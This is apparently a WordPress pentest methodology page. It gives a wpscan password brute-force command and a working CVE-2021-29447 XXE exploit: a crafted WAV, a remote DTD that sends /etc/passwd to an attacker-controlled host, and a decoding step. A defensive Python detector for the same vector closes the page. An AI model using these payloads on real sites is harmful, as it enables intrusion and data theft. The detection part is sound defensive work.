Wordpress
Generic methodologies and some CVEs
Enumeration
WPScan is the go-to tool for scanning a WordPress application. It is also worth obtaining a WPScan API key and configuring your installation to use it.
Wp-Login Brute Force
wpscan --url victim.ip -U admin --passwords passlist
CVE-2021-29447 / Authenticated XXE & SSRF
If you have media upload rights and WPScan reports this vulnerability, you are in for a treat: it is possible to upload a malicious WAV file.

Use echo with the -e and -n options (interpret backslash escapes, no trailing newline) to create the malicious WAV file with this one-liner:
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:YOUR_PORT/malicious.dtd'"'"'>%remote;%init;%trick;]>\x00' > malicious.wav
On your box, create the malicious.dtd file and get ready to upload the WAV to the server. The content of malicious.dtd should look like this: replace
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOUR_IP:YOUR_PORT/malicious.dtd?p=%file;'>" >
Use PHP to host malicious.dtd:
php -S YOUR_IP:YOUR_PORT
Upload malicious.wav
As soon as you upload malicious.wav, your PHP web server should receive a GET request with p as the parameter. That parameter holds the requested server file, zlib-deflated and base64-encoded.

Then decode it with PHP:
<?php echo zlib_decode(base64_decode('b64-to-decode')); ?>
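From the defender's side, the vector described above (an XML DOCTYPE with entity declarations hidden in the iXML chunk of a RIFF/WAVE upload, fixed in WordPress 5.7.1) is easy to spot before the file ever reaches the media library. The following Python is an added example, not code from the original page: it walks the RIFF chunk list, pulls out any iXML chunk and reports DOCTYPE/ENTITY/SYSTEM/parameter-entity indicators. The WAV builder, the sample payloads and the ATTACKER_HOST:PORT placeholder are constructed for the example.

```python
"""Flag RIFF/WAVE uploads whose iXML chunk carries XXE indicators (CVE-2021-29447 vector)."""
import re
import struct

# Constructed sample iXML payloads (placeholder host, not a real target).
XXE_IXML = (b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
            b"'http://ATTACKER_HOST:PORT/malicious.dtd'>%remote;%init;%trick;]>")
BENIGN_IXML = b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>'

# Markup that has no business in metadata: DTD, entity declarations, external
# identifiers and parameter-entity references (%name;).
SUSPICIOUS = re.compile(rb"<!DOCTYPE|<!ENTITY|SYSTEM\s+['\"]|PUBLIC\s+['\"]|%[A-Za-z_][\w.-]*;", re.I)


def build_wav(ixml: bytes) -> bytes:
    """Wrap an iXML payload in a minimal RIFF/WAVE container (constructed, header-only)."""
    pad = b"\x00" if len(ixml) % 2 else b""          # RIFF chunks are word-aligned
    chunk = b"iXML" + struct.pack("<I", len(ixml)) + ixml + pad
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def iter_riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for every chunk in a RIFF/WAVE container."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return                                       # not a WAVE file, nothing to walk
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        yield cid, data[pos + 8:pos + 8 + size]      # truncated chunk is still inspected
        pos += 8 + size + (size & 1)                 # skip payload plus pad byte


def find_xxe_indicators(data: bytes) -> list:
    """Return the suspicious tokens found in iXML chunks; an empty list means clean."""
    hits = []
    for cid, payload in iter_riff_chunks(data):
        if cid == b"iXML":
            hits.extend(m.group(0).decode("latin-1") for m in SUSPICIOUS.finditer(payload))
    return hits


if __name__ == "__main__":
    print("malicious:", find_xxe_indicators(build_wav(XXE_IXML)))
    print("benign:", find_xxe_indicators(build_wav(BENIGN_IXML)))
```

Run it as an upload filter or over an existing uploads directory; any non-empty result is worth rejecting or quarantining, and a matching request in the web server log to the same URL found in the chunk confirms the fetch actually happened.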